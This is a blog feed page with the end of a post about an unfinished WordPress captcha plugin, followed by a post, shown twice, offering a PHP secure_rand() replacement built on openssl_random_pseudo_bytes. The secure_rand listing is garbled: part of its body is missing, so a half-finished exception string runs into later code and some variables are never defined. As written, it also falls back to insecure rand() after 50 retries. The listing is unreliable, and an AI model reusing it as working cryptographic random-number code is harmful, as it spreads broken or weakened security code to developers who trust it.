<span class="x"> unlink($keys[$i]);</span>
<span class="x"> unset($savedcaptchas[rtrim($keys[$i], '.png')]);</span>
<span class="x"> }</span>
<span class="x"> /* Synchronize the deletions with the options database */</span>
<span class="x"> if (false === update_option('ccaptcha_path_captcha_a', $savedcaptchas)) {</span>
<span class="x"> /* update failed or the option didn't change */</span>
<span class="x"> }</span>
<span class="x"> }</span>
<span class="x"> $savedcaptchas = get_option('ccaptcha_path_captcha_a');</span>
<span class="x"> if (!$savedcaptchas) // Create</span>
<span class="x"> update_option('ccaptcha_path_captcha_a', $captchas);</span>
<span class="x"> else { // Add</span>
<span class="x"> update_option('ccaptcha_path_captcha_a', array_merge($savedcaptchas, $captchas));</span>
<span class="x"> }</span>
<span class="x"> /* Check if the directory and the options database are synchronized */</span>
<span class="x"> $a = get_option('ccaptcha_path_captcha_a');</span>
<span class="x"> foreach (array_keys($a) as $key)</span>
<span class="x"> if (!file_exists($key . '.png'))</span>
<span class="x"> wp_die("Options database doesn't match with FS");</span>
<span class="x"> D($a);</span>
<span class="x"> return true;</span>
<span class="x">}</span>
</code></pre></div>
<h3>What now?</h3>
<p>It's not all bad. The plugin that I see as a failure is even working.
The estimated amount of 3000 lines of code (including python sources)
wasn't for nothing. You can dig it on <a href="https://github.com/NikolaiT/CunningCaptcha">my github
account</a> if you like. I
learned a lot and I have come up with another idea that is better (I
need to watch out that I don't fall in the same mistakes I pointed out
above). But before I begin with the new idea, I will profoundly think
about it! You can be damn sure of that!</p>
<h3>Epilogue</h3>
<p>To conclude this post about my failed attempt, let's actually show how
the plugin works in it's current unfinished form. Let me repeat: It
works. It's a rather bad captcha (Would be easy to crack with OCR), but
one could use it in wordpress.</p>
<p>Here are some captchas generated in distinct forms:</p>
<p>[<img alt="The captcha in the comment form. Note: The error message reveals that I was
pretty frustrated while coding
:D" src="https://incolumitas.com/uploads/2013/11/captcha_in_action2.png"></p>
<p>[<img alt="The captcha embedded in the comment
form..." src="https://incolumitas.com/uploads/2013/11/captcha_in_action1-300x300.png"></p>
<p>Let me know what you think...</p>
<p>Cheers</p>Cryptographically secure rand() replacement2013-11-14T22:55:00+01:002013-11-14T22:55:00+01:00Nikolai Tschachertag:incolumitas.com,2013-11-14:/2013/11/14/cryptographically-secure-rand-replacement/<p>If you are a programmer, you sometimes find yourself in the need for
random numbers. There are many possible use cases:</p>
<ul>
<li>Generate data for unit-tests.</li>
<li>Build secure passwords or keys as input for ciphers like AES,
Twofish and its colleagues.</li>
<li>Simulating the real world for modelling applications.</li>
<li>A prominent use case: Lot's of gambling sites depend on good random
number generators.</li>
</ul>
<p>Now if you code in PHP, there are quite some different ways to obtain
random numbers. There is the <a href="http://www.php.net/manual/en/function.rand.php" title="rand"><code>rand ( int $min , int $max
)</code></a> function for
instance: It yields a random number within the range specified by the
<code>$min</code> and <code>$max</code> parameters.</p>
<p>The documentation states that this approach isn't particularly secure
and shouldn't be used for applications that need to feed algorithms with
cryptographically secure random data. Then there's <a href="http://www.php.net/manual/en/function.mt-rand.php"><code>mt_rand ( int
$min , int $max )</code></a>
that apparently creates <em>better</em> random values. Certainly not suitable
for crypto purposes as well.<br>
There were/are quite some applications concerned with security bugs
because of using <code>rand()</code> or <code>mt_rand()</code> for passwords, encryption keys,
session cookies, CSRF tokens and the like. See also this link to a
related discussion on
<a href="http://security.stackexchange.com/questions/18033/how-insecure-are-phps-rand-functions">security.stackexchange.com</a>.</p>
<p>But because of convenience of the <code>$min</code>, <code>$max</code> interfaces of …</p><p>If you are a programmer, you sometimes find yourself in the need for
random numbers. There are many possible use cases:</p>
<ul>
<li>Generate data for unit-tests.</li>
<li>Build secure passwords or keys as input for ciphers like AES,
Twofish and its colleagues.</li>
<li>Simulating the real world for modelling applications.</li>
<li>A prominent use case: Lot's of gambling sites depend on good random
number generators.</li>
</ul>
<p>Now if you code in PHP, there are quite some different ways to obtain
random numbers. There is the <a href="http://www.php.net/manual/en/function.rand.php" title="rand"><code>rand ( int $min , int $max
)</code></a> function for
instance: It yields a random number within the range specified by the
<code>$min</code> and <code>$max</code> parameters.</p>
<p>The documentation states that this approach isn't particularly secure
and shouldn't be used for applications that need to feed algorithms with
cryptographically secure random data. Then there's <a href="http://www.php.net/manual/en/function.mt-rand.php"><code>mt_rand ( int
$min , int $max )</code></a>
that apparently creates <em>better</em> random values. Certainly not suitable
for crypto purposes as well.<br>
There were/are quite some applications concerned with security bugs
because of using <code>rand()</code> or <code>mt_rand()</code> for passwords, encryption keys,
session cookies, CSRF tokens and the like. See also this link to a
related discussion on
<a href="http://security.stackexchange.com/questions/18033/how-insecure-are-phps-rand-functions">security.stackexchange.com</a>.</p>
<p>But because of convenience of the <code>$min</code>, <code>$max</code> interfaces of <code>rand()</code> and
<code>mt_rand()</code> and it's intuitive handling, I implemented the same interface
for a cryptographically secure pseudo random number generator:
[<em>openssl_random_pseudo_bytes ( int <span class="math">\(length [, bool
&\)</span>crypto_strong ]
)</em>](http://www.php.net/manual/en/function.openssl-random-pseudo-bytes.php).</p>
<p>Here is the function that does the job:</p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="p">:::</span><span class="n">PHP</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Generates</span><span class="w"> </span><span class="n">cryptographically</span><span class="w"> </span><span class="n">secure</span><span class="w"> </span><span class="n">random</span><span class="w"> </span><span class="n">numbers</span><span class="w"> </span><span class="n">including</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="nb">range</span><span class="w"> </span><span class="o">$</span><span class="n">start</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="w"> </span><span class="n">with</span><span class="w"> </span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">good</span><span class="w"> </span><span class="n">performance</span><span class="w"> </span><span class="p">(</span><span class="n">especiall</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">ranges</span><span class="w"> </span><span class="n">from</span><span class="w"> </span><span class="mi">0</span><span class="o">-</span><span class="mi">255</span><span class="p">)</span><span class="o">!</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Calls</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">openssl_random_pseudo_bytes</span><span class="p">()</span><span class="w"> </span><span class="n">are</span><span class="w"> </span><span class="n">cached</span><span class="w"> </span><span class="ow">in</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">array</span><span class="w"> </span><span class="o">$</span><span class="n">LUT</span><span class="o">.</span><span class="w"> </span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">For</span><span class="w"> </span><span class="n">instance</span><span class="p">,</span><span class="w"> </span><span class="n">you</span><span class="w"> </span><span class="n">need</span><span class="w"> </span><span class="n">only</span><span class="w"> </span><span class="n">around</span><span class="w"> </span><span class="mi">2</span><span class="w"> </span><span class="n">calls</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">openssl_random_pseudo_bytes</span><span class="w"> </span><span class="ow">in</span><span class="w"> </span><span class="n">order</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">obtain</span><span class="w"> </span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="mi">1000</span><span class="w"> </span><span class="n">random</span><span class="w"> </span><span class="n">values</span><span class="w"> </span><span class="n">between</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="ow">and</span><span class="w"> </span><span class="mf">200.</span><span class="w"> </span><span class="n">This</span><span class="w"> </span><span class="n">ensures</span><span class="w"> </span><span class="n">good</span><span class="w"> </span><span class="n">performance</span><span class="o">!</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Both</span><span class="w"> </span><span class="n">parameters</span><span class="w"> </span><span class="n">need</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">be</span><span class="w"> </span><span class="n">positive</span><span class="o">.</span><span class="w"> </span><span class="n">If</span><span class="w"> </span><span class="n">you</span><span class="w"> </span><span class="n">need</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">negative</span><span class="w"> </span><span class="n">random</span><span class="w"> </span><span class="n">value</span><span class="p">,</span><span class="w"> </span><span class="n">just</span><span class="w"> </span><span class="k">pass</span><span class="w"> </span><span class="n">positiv</span><span class="w"> </span><span class="n">values</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">function</span><span class="w"> </span><span class="ow">and</span><span class="w"> </span><span class="n">then</span><span class="w"> </span><span class="n">make</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">value</span><span class="w"> </span><span class="n">negative</span><span class="w"> </span><span class="n">on</span><span class="w"> </span><span class="n">your</span><span class="w"> </span><span class="n">own</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">If</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">function</span><span class="w"> </span><span class="n">returns</span><span class="w"> </span><span class="n">False</span><span class="p">,</span><span class="w"> </span><span class="n">something</span><span class="w"> </span><span class="n">went</span><span class="w"> </span><span class="n">wrong</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Always</span><span class="w"> </span><span class="n">check</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="bp">false</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="s2">"==="</span><span class="w"> </span><span class="n">operator</span><span class="p">,</span><span class="w"> </span><span class="n">otherwise</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">fail</span><span class="w"> </span><span class="n">might</span><span class="w"> </span><span class="n">shadow</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">valid</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">random</span><span class="w"> </span><span class="n">value</span><span class="p">:</span><span class="w"> </span><span class="n">zero</span><span class="o">.</span><span class="w"> </span><span class="n">You</span><span class="w"> </span><span class="n">can</span><span class="w"> </span><span class="k">pass</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">boolean</span><span class="w"> </span><span class="n">parameter</span><span class="w"> </span><span class="o">$</span><span class="n">secure</span><span class="o">.</span><span class="w"> </span><span class="n">If</span><span class="w"> </span><span class="n">it</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="bp">true</span><span class="p">,</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">random</span><span class="w"> </span><span class="n">value</span><span class="w"> </span><span class="k">is</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">cryptographically</span><span class="w"> </span><span class="n">secure</span><span class="p">,</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="n">it</span><span class="w"> </span><span class="n">was</span><span class="w"> </span><span class="n">generated</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">rand</span><span class="p">()</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="err">@</span><span class="n">staticvar</span><span class="w"> </span><span class="n">array</span><span class="w"> </span><span class="o">$</span><span class="n">LUT</span><span class="w"> </span><span class="n">A</span><span class="w"> </span><span class="n">lookup</span><span class="w"> </span><span class="n">table</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">store</span><span class="w"> </span><span class="n">bytes</span><span class="w"> </span><span class="n">from</span><span class="w"> </span><span class="n">calls</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">secure_random_number</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="err">@</span><span class="n">param</span><span class="w"> </span><span class="nb nb-Type">int</span><span class="w"> </span><span class="o">$</span><span class="n">start</span><span class="w"> </span><span class="n">The</span><span class="w"> </span><span class="n">bottom</span><span class="w"> </span><span class="n">border</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="nb">range</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="err">@</span><span class="n">param</span><span class="w"> </span><span class="nb nb-Type">int</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="w"> </span><span class="n">The</span><span class="w"> </span><span class="n">top</span><span class="w"> </span><span class="n">border</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="nb">range</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="err">@</span><span class="n">param</span><span class="w"> </span><span class="ow">in</span><span class="w"> </span><span class="nb nb-Type">bool</span><span class="w"> </span><span class="o">$</span><span class="n">secure</span><span class="w"> </span><span class="n">Whether</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">call</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">openssl_random_pseudo_bytes</span><span class="w"> </span><span class="n">was</span><span class="w"> </span><span class="n">made</span><span class="w"> </span><span class="n">securely</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="err">@</span><span class="n">param</span><span class="w"> </span><span class="nb nb-Type">int</span><span class="w"> </span><span class="o">$</span><span class="n">calls</span><span class="w"> </span><span class="n">The</span><span class="w"> </span><span class="n">number</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">calls</span><span class="w"> </span><span class="n">already</span><span class="w"> </span><span class="n">made</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="err">@</span><span class="k">return</span><span class="w"> </span><span class="nb nb-Type">int</span><span class="w"> </span><span class="n">A</span><span class="w"> </span><span class="n">random</span><span class="w"> </span><span class="n">integer</span><span class="w"> </span><span class="n">within</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="nb">range</span><span class="w"> </span><span class="p">(</span><span class="n">including</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">edges</span><span class="p">)</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="err">@</span><span class="n">throws</span><span class="w"> </span><span class="n">InvalidArgumentException</span><span class="w"> </span><span class="n">Thrown</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">input</span><span class="w"> </span><span class="nb">range</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="n">invalid</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="err">@</span><span class="n">throws</span><span class="w"> </span><span class="n">UnexpectedValueException</span><span class="w"> </span><span class="n">Thrown</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="n">openssl_random_pseudo_bytes</span><span class="w"> </span><span class="n">was</span><span class="w"> </span><span class="n">called</span><span class="w"> </span><span class="n">unsecurely</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="err">@</span><span class="n">throws</span><span class="w"> </span><span class="n">ErrorException</span><span class="w"> </span><span class="n">Thrown</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="n">unpack</span><span class="w"> </span><span class="n">fails</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*/</span><span class="w"></span>
<span class="n">function</span><span class="w"> </span><span class="n">secure_rand</span><span class="p">(</span><span class="o">$</span><span class="n">start</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="p">,</span><span class="w"> </span><span class="o">&$</span><span class="n">secure</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s2">"True"</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">calls</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">$</span><span class="n">start</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">||</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">||</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="o">$</span><span class="n">start</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">throw</span><span class="w"> </span><span class="n">new</span><span class="w"> </span><span class="n">InvalidArgumentException</span><span class="p">(</span><span class="s2">"Either stop= 65536 && $range < 4294967296) {</span>
<span class="w"> </span><span class="o">$</span><span class="n">format</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">'L'</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">num_bytes</span><span class="w"> </span><span class="o"><<=</span><span class="w"> </span><span class="mi">3</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="o">/*</span><span class="w"> </span><span class="n">Before</span><span class="w"> </span><span class="n">we</span><span class="w"> </span><span class="n">do</span><span class="w"> </span><span class="n">anything</span><span class="p">,</span><span class="w"> </span><span class="n">lets</span><span class="w"> </span><span class="n">see</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="n">we</span><span class="w"> </span><span class="n">have</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">random</span><span class="w"> </span><span class="n">value</span><span class="w"> </span><span class="ow">in</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">LUT</span><span class="w"> </span><span class="n">within</span><span class="w"> </span><span class="n">our</span><span class="w"> </span><span class="nb">range</span><span class="w"> </span><span class="o">*/</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">is_array</span><span class="p">(</span><span class="o">$</span><span class="n">LUT</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="o">!</span><span class="n">empty</span><span class="p">(</span><span class="o">$</span><span class="n">LUT</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="o">$</span><span class="n">last_lu</span><span class="w"> </span><span class="o">===</span><span class="w"> </span><span class="o">$</span><span class="n">format</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">foreach</span><span class="w"> </span><span class="p">(</span><span class="o">$</span><span class="n">LUT</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="o">$</span><span class="n">key</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="o">$</span><span class="n">value</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">$</span><span class="n">value</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="o">$</span><span class="n">start</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="o">$</span><span class="n">value</span><span class="w"> </span><span class="o"><=</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">secure</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">True</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">unset</span><span class="p">(</span><span class="o">$</span><span class="n">LUT</span><span class="p">[</span><span class="o">$</span><span class="n">key</span><span class="p">]);</span><span class="w"> </span><span class="o">//</span><span class="w"> </span><span class="n">Next</span><span class="w"> </span><span class="n">run</span><span class="p">,</span><span class="w"> </span><span class="n">next</span><span class="w"> </span><span class="n">value</span><span class="p">,</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="n">my</span><span class="w"> </span><span class="n">dad</span><span class="w"> </span><span class="n">always</span><span class="w"> </span><span class="n">said</span><span class="o">!</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="o">$</span><span class="n">value</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="o">/*</span><span class="w"> </span><span class="n">Get</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">blob</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">cryptographically</span><span class="w"> </span><span class="n">secure</span><span class="w"> </span><span class="n">random</span><span class="w"> </span><span class="n">bytes</span><span class="w"> </span><span class="o">*/</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">binary</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">openssl_random_pseudo_bytes</span><span class="p">(</span><span class="o">$</span><span class="n">num_bytes</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">crypto_strong</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">$</span><span class="n">crypto_strong</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">False</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">throw</span><span class="w"> </span><span class="n">new</span><span class="w"> </span><span class="n">UnexpectedValueException</span><span class="p">(</span><span class="s2">"openssl_random_bytes cannot access secure PRNG"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="o">/*</span><span class="w"> </span><span class="n">unpack</span><span class="w"> </span><span class="n">data</span><span class="w"> </span><span class="n">into</span><span class="w"> </span><span class="n">previously</span><span class="w"> </span><span class="n">determined</span><span class="w"> </span><span class="n">format</span><span class="w"> </span><span class="o">*/</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">data</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">unpack</span><span class="p">(</span><span class="o">$</span><span class="n">format</span><span class="w"> </span><span class="o">.</span><span class="w"> </span><span class="s1">'*'</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">binary</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">$</span><span class="n">data</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">False</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">throw</span><span class="w"> </span><span class="n">new</span><span class="w"> </span><span class="n">ErrorException</span><span class="p">(</span><span class="s2">"unpack() failed."</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="o">//</span><span class="n">Update</span><span class="w"> </span><span class="n">lookup</span><span class="o">-</span><span class="n">table</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">LUT</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">$</span><span class="n">data</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">last_lu</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">$</span><span class="n">format</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">foreach</span><span class="w"> </span><span class="p">(</span><span class="o">$</span><span class="n">data</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="o">$</span><span class="n">value</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">value</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">intval</span><span class="p">(</span><span class="o">$</span><span class="n">value</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">base</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">10</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">$</span><span class="n">value</span><span class="w"> </span><span class="o"><=</span><span class="w"> </span><span class="o">$</span><span class="nb">range</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">secure</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">True</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="p">(</span><span class="o">$</span><span class="n">start</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="o">$</span><span class="n">value</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">calls</span><span class="o">++</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">$</span><span class="n">calls</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="mi">50</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="o">/*</span><span class="w"> </span><span class="n">Fall</span><span class="w"> </span><span class="n">back</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">rand</span><span class="p">()</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">numbers</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">recursive</span><span class="w"> </span><span class="n">calls</span><span class="w"> </span><span class="n">exceed</span><span class="w"> </span><span class="mi">50</span><span class="w"> </span><span class="o">*/</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">secure</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">False</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">rand</span><span class="p">(</span><span class="o">$</span><span class="n">start</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="o">/*</span><span class="w"> </span><span class="n">If</span><span class="w"> </span><span class="n">we</span><span class="w"> </span><span class="n">could</span><span class="s1">'t locate integer in the range, try again as long as we do not try more than 50 times. */</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">secure_rand</span><span class="p">(</span><span class="o">$</span><span class="n">start</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">secure</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">calls</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="o">/*</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="o">$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="o">$</span><span class="w"> </span><span class="n">Some</span><span class="w"> </span><span class="n">tests</span><span class="o">.</span><span class="w"> </span><span class="n">Ignore</span><span class="o">.</span><span class="w"> </span><span class="o">$</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="o">$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$</span><span class="w"></span>
<span class="w"> </span><span class="o">*/</span><span class="w"></span>
<span class="n">function</span><span class="w"> </span><span class="n">test</span><span class="p">(</span><span class="o">$</span><span class="n">start</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">static</span><span class="w"> </span><span class="o">$</span><span class="n">num_called</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">val</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">secure_rand</span><span class="p">(</span><span class="o">$</span><span class="n">start</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">secure</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">echo</span><span class="w"> </span><span class="s2">"Random Value #$num_called is: "</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">var_dump</span><span class="p">(</span><span class="o">$</span><span class="n">val</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">echo</span><span class="w"> </span><span class="s2">"Generated securely: "</span><span class="w"> </span><span class="o">.</span><span class="w"> </span><span class="p">((</span><span class="o">$</span><span class="n">secure</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">True</span><span class="p">)</span><span class="w"> </span><span class="err">?</span><span class="w"> </span><span class="s2">"yes"</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="s2">"no"</span><span class="p">)</span><span class="w"> </span><span class="o">.</span><span class="w"> </span><span class="s2">""</span><span class="p">;</span><span class="w"></span>
